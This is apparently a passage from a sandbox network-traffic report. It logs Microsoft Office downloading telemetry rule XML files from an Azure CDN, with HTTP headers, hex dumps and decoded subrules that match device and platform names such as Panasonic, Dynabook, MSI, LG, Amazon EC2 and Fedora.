                                                                                                                                                                                                2024-11-23 15:54:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                50192.168.2.44988113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:15 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:15 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                x-ms-request-id: 16d74281-d01e-0066-164b-3cea17000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155415Z-15b8b599d882l6clhC1TEBxd5c000000034g000000002352
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:15 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                51192.168.2.44988313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:15 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:15 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 423
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                x-ms-request-id: f14fa7ac-201e-000c-4a8c-3a79c4000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155415Z-174c587ffdf6b487hC1TEBydsn00000002zg00000000n3hy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:15 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                52192.168.2.44988413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:17 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:17 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 478
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155417Z-174c587ffdf89smkhC1TEB697s000000035g00000000f446
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:17 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                53192.168.2.44988613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:17 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:17 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155417Z-174c587ffdfb5q56hC1TEB04kg0000000350000000002v25
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:18 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                54192.168.2.44988513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:17 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:17 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                x-ms-request-id: e4221271-301e-0051-4239-3d38bb000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155417Z-174c587ffdf59vqchC1TEByk6800000003ag0000000080rr
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:18 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                55192.168.2.44988713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:17 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:17 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 400
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                x-ms-request-id: ed66cbfc-201e-0051-7e30-3c7340000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155417Z-15b8b599d885ffrhhC1TEBtuv0000000033g00000000kxfn
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:18 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                56192.168.2.44988813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:17 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:17 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 479
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                x-ms-request-id: c4b984cf-b01e-001e-2446-3c0214000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155417Z-15b8b599d88pxmdghC1TEBux9c000000039g0000000079ha
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:18 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                57192.168.2.44988913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:19 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:19 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 425
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                x-ms-request-id: 62f36519-501e-0016-468c-3a181b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155419Z-174c587ffdfgcs66hC1TEB69cs00000002y000000000hhm0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:20 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                58192.168.2.44989313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:19 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:20 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                x-ms-request-id: 9177d9ad-001e-0028-350e-3dc49f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155420Z-178bfbc474bv7whqhC1NYC1fg400000004qg000000007hp2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:20 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                59192.168.2.44989113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:19 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:20 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 448
